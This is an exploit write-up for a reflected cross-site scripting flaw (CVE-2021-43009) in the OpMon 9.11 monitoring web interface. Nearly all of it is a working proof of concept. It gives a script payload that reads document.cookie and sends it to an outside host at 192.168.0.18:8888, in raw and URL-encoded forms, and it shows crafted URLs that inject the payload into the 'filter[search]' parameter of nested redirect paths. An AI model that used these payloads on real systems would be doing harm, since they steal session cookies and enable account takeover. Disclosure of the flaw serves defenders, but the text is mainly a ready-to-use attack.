# Exploit Title: Opmon 9.11 - Cross-site Scripting
# Date: 2021-06-01
# Exploit Author: p3tryx
# Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time
# Version: 9.11
# Tested on: Chrome, IE and Firefox
# CVE : CVE-2021-43009
# URL POC:
<script>
alert(document.cookie);
var i=new Image;
i.src="http://192.168.0.18:8888/?"+document.cookie;
</script>
Url-encoded Payload
%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E
```
*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*
<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>
[search]=%27};PAYLOAD&x=0&y=0
*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*
<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>
[search]=%27};
%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E
&x=0&y=0
```